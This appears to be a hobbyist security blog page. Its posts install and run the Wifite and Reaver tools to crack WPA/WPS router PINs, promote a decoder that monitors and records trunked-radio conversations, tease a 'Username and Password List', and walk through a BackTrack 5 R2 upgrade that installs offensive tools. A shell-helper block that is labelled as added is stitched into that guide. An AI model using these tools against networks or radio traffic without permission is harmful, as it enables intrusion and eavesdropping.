To download and execute wifite, run the commands below:
wget https://raw.github.com/derv82/wifite/master/wifite.py
chmod +x wifite.py
./wifite.py

Required Programs

Please see the installation guide on the wiki for help installing any of the tools below.
  • Python 2.6.x or 2.7.x. Wifite is a Python script and requires Python to run.
  • aircrack-ng suite. This is absolutely required. The specific programs used in the suite are:
    • airmon-ng,
    • airodump-ng,
    • aireplay-ng,
    • packetforge-ng, and
    • aircrack-ng.
  • Standard linux programs.
    • iwconfig, ifconfig, which, iw

Suggested Programs

* indicates program is not included in Backtrack 5 R1
  • *reaver, a Wifi-Protected Setup (WPS) attack tool. Reaver includes a scanner "walsh" (or "wash") for detecting WPS-enabled access points. Wifite uses Reaver to scan for and attack WPS-enabled routers.
  • *pyrit, a GPU cracker for WPA PSK keys. Wifite uses pyrit (if found) to detect handshakes. In the future, Wifite may include an option to crack WPA handshakes via pyrit.
  • tshark. Comes bundled with Wireshark, packet sniffing software.
  • cowpatty, a WPA PSK key cracker. Wifite uses cowpatty (if found) to detect handshakes.

Licensing

Wifite is licensed under the GNU General Public License version 2 (GNU GPL v2).
(C) 2011 Derv Merkler

I am testing Wifite.

Starting up Wifite v2 BETA


Wifite in action using BT5 R2 and RTL8187 wireless adapter
                                   

See the result: it takes 2 to 10 hours to gather the PIN.
                                     

Thanks to BackTrack and derv82 for their nice job.....happy hunting!!

Sunday, April 22, 2012

Malaysia Open Source Conference 2012 (MOSC2012)

                                      
Date for MOSC2012: 7th, 8th and 9th July 2012
Berjaya Time Square, Kuala Lumpur, Malaysia

Call for Speakers is now open; click here.

Don't miss news about MOSC2012
Register Here - For Latest Update

Archive of the call for MOSC2012 speakers email :-


" Enterprising Open Source"

Call For Speakers Malaysia Open Source Conference 2012 (MOSC2012) 

Join MOSC2012 Facebook Page and Twitter for latest updates :-


Area of Interests :-

Technical topic can be :-


  • Cloud Computing and Virtualization
  • Social Media
  • Big Data
  • Big Storage
  • Business Intelligence
  • Enterprise Resource Management
  • Customer Relationship Management
  • Voice Over IP
  • Programming Language
  • Mobile Computing
  • Green Data Centre
  • Computer Security

Non technical can be :-

  • Policy
  • Case Study
  • Advocacy program
  • Patent and Trade Agreement
  • Open Source License in Enterprise Environment


With the theme "Enterprising Open Source", MOSC 2012 is set to explore Open Source technology at the Enterprise level, and to promote the development of local Open Source solutions for Enterprise environments to be used worldwide.



Call for speakers is open to all individuals, organizations, universities, companies and government agencies who wish to present on a case study, development, implementation or application. The working paper must follow a knowledge-sharing concept. The working paper must not contain marketing materials promoting a certain product or company.



Please note that the closing date for the CFP is April 30, 2012, and the selected papers will be notified after the selection process is completed by the committee. Selected speakers must submit their presentation slides before June 15, 2012.


Prospective speakers are invited to submit an abstract of 100 - 200 words using the online form below.

Username and Password List ......enjoy!


Tuesday, April 17, 2012

Multipsk Ham Radio Software from F6CTE

Modes supported by Multipsk:
  • Phase Shift Keying modes:
    • BPSK: BPSK31-63-125-250 / CHIP (64/128) / PSK10 / PSKFEC31 / PSKAM10-31-50
    • BPSK with SSTV: PSK63 F - PSK220F + DIGISSTV "Run"
    • QPSK: QPSK31-63-125-250
    • MPSK: MT63
    • PACKET BPSK1200-250-63-31 + APRS+ DIGISSTV "Run"
    • MIL-STD-188-110A - 4285
    • HFDL
  • On-Off Keying Modes: CW / CCW-OOK / CCW-FSK / QRSS
  • Frequency Shift Keying modes:
    • PACKET: 110-300-1200 bauds + APRS+ DIGISSTV "Run"
    • PACTOR 1 / AMTOR FEC-Navtex / AMTOR ARQ / SITOR A
    • ASCII / RTTY 45-50-75-100-110-150-200 / SYNOP + SHIP / IEC 870-5
    • 1382 / GMDSS DSC / ACARS (VHF) / DGPS / NWR SAME / ARQ-E / ARQ-E3
  • Multi Frequency Shift Keying modes:
    • MFSK8 / MFSK16 (+SSTV)
    • OLIVIA / Contestia / RTTYM / VOICE
    • THROB/THROBX
    • DominoF / DominoEX
    • PAX / PAX2
    • Automatic Link Establishment (see http://www.hflink.com) MIL-STD-188-141A + ARQ FAE / ALE400 + ARQ FAE
    • DTMF, SELCAL
    • JT65 (A B and C)
    • LENTUS
    • COQUELET
  • Hellschreiber modes: FELD HELL / FM HELL(105-245) / PSK HELL / HELL 80
  • Graphic modes: HF FAX / SSTV / PSK SSTV modes (mentioned above) / MFSK16 SSTV (mentioned above)
  • DSP modes: Filters / Analysis / Binaural CW reception
  • RTTY, CW, BPSK31, BPSK63 and PSKFEC31 Panoramics
  • Identifiers: Video ID / RS ID / Call ID
  • TCP/IP digital modem
  • Integrated SDR demodulator/modulator
  • To download, click here: Multipsk + Clock
  • For more detail, go to the developer website F6CTE




Sunday, April 8, 2012

TRUNKVIEW The MPT1327 Protocol Decoder

TrunkView is an MPT1327 protocol decoder, used in a single radio setup without the need for a discriminator output.
MPT1327 Trunked Radio networks, such as the Belgium/Netherlands Entropia, can be tracked and monitored.


Features
  • Alpha tagging: label prefixes and individual radio idents.
  • Tracking: if a suitable scanner is used, TrunkView tunes it to an assigned voice channel.
  • Voice channels assigned by the Trunking System Controller are shown in a separate window.
  • Custom bandplan support.
  • Short Data Message decoding.
  • Real time Traffic analysis tool.
  • Option to create logfiles.
  • Option to record voice conversations (WAV only).
  • Extensive filter possibilities.
  • Band scan facility.
  • Minimizes to the system tray.
  • No discriminator output needed.
  • Network configuration: System id, Site name, Control Channel.

Technical
TrunkView uses (software) algorithms that are made available by Stefan Petersen © 2003.
For any MPT1327 protocol related question, you can refer to the protocol standard (about 290 pages!).

Developer site: linito.net; download TrunkView v2.21 here.

This is an old trunking system, but it is still used today .....happy hunting!!!

Wednesday, February 29, 2012

Upgrading to BackTrack 5 R2

The long awaited release of the BackTrack 5 R2 kernel has arrived, and it’s now available in our repositories. With a spanking brand new 3.2.6 kernel, a huge array of new and updated tools and security fixes, BT5 R2 will provide a more stable and complete penetration testing environment than ever before. We will start a series of blog posts on how to upgrade, deal with VMWare, and even build your own updated BT5 R2 by yourself. For now though, here’s how to get the new kernel and all of the updated goodness:

1. Update and upgrade your BT5 (R1) installation:

apt-get update
apt-get dist-upgrade
apt-get install beef
reboot

Once that’s done, you should already have the new kernel installed as well as any last updates we have for the official R2 release. You need to reboot to have the 3.2.6 kernel kick in.

2. OPTIONAL – Once rebooted, log back in, and get your pretty splash screen back.

fix-splash
reboot

On the next reboot, you should see the red console splash screen appear.

3. Verify that you are running a 3.2.6 kernel:

uname -a

You should see something like “Linux bt 3.2.6 …”

4. Feel free to install any or all of the new tools featured in BackTrack 5 R2:

apt-get install pipal findmyhash metasploit joomscan hashcat-gui golismero easy-creds pyrit sqlsus vega libhijack tlssled hash-identifier wol-e dirb reaver wce sslyze magictree nipper-ng rec-studio hotpatch xspy arduino rebind horst watobo patator thc-ssl-dos redfang findmyhash killerbee goofile bt-audit bluelog extundelete se-toolkit casefile sucrack dpscan dnschef

5. Add the new security updates repository to /etc/apt/sources.list, and run another upgrade.

echo "deb http://updates.repository.backtrack-linux.org revolution main microverse non-free testing" >> /etc/apt/sources.list
apt-get update
apt-get dist-upgrade

During the last upgrade you’ll be asked about file revision updates. Make sure to always keep the locally installed file. Feel free to press “Enter” and accept all the defaults.

6. Some of the newly installed services will be set to start on boot. We like disabling these as needed:

/etc/init.d/apache2 stop
/etc/init.d/cups stop
/etc/init.d/winbind stop

update-rc.d -f cups remove
update-rc.d -f apache2 remove
update-rc.d -f winbind remove
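Two small helpers for the procedure above, added here as an example and not part of the Offensive Security post: step 5 appends the repository line with `>>`, so re-running it leaves duplicate entries in /etc/apt/sources.list, and step 3 asks you to eyeball `uname -a`. The function names, the constructed `uname` strings and the temporary file are assumptions for illustration.

```shell
#!/bin/sh
# Added example (not from the BackTrack post): idempotent helpers for steps 3 and 5.

# The repository line from step 5 of the post.
REPO_LINE='deb http://updates.repository.backtrack-linux.org revolution main microverse non-free testing'

# ensure_repo_line FILE [LINE]: append LINE to FILE only if an identical line is
# not already present, so the step can be re-run safely. Prints "added" or
# "present"; returns 1 only if FILE cannot be created or written.
ensure_repo_line() {
    file=$1
    line=${2:-$REPO_LINE}
    [ -e "$file" ] || : > "$file" || return 1
    if grep -qxF -- "$line" "$file"; then
        echo present
    else
        printf '%s\n' "$line" >> "$file" || return 1
        echo added
    fi
}

# kernel_release_ok WANTED [UNAME_OUTPUT]: take the third field of "uname -a"
# (the kernel release, "3.2.6" in "Linux bt 3.2.6 ...") and succeed only if it
# equals WANTED or starts with "WANTED." / "WANTED-". UNAME_OUTPUT defaults to
# the live uname -a and is overridable so the check can be tested offline.
kernel_release_ok() {
    wanted=$1
    out=${2:-$(uname -a)}
    rel=$(printf '%s\n' "$out" | awk '{print $3}')
    case "$rel" in
        "$wanted"|"$wanted".*|"$wanted"-*) return 0 ;;
        *) echo "kernel is $rel, expected $wanted" >&2; return 1 ;;
    esac
}

# Usage (as root, after the reboot in step 1):
#   kernel_release_ok 3.2.6 && ensure_repo_line /etc/apt/sources.list && apt-get update
```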

And…you’re done! Expect a more comprehensive introduction to BT5 R2 on the day of the official release – March 1st! The BackTrack 5 R2 ISOs will be available for download from our site on March 1st via Torrent only. HTTP links will be added a few days later. Thanks to the BackTrack-Linux.org team; for more detail go to the website. Happy Hunting!!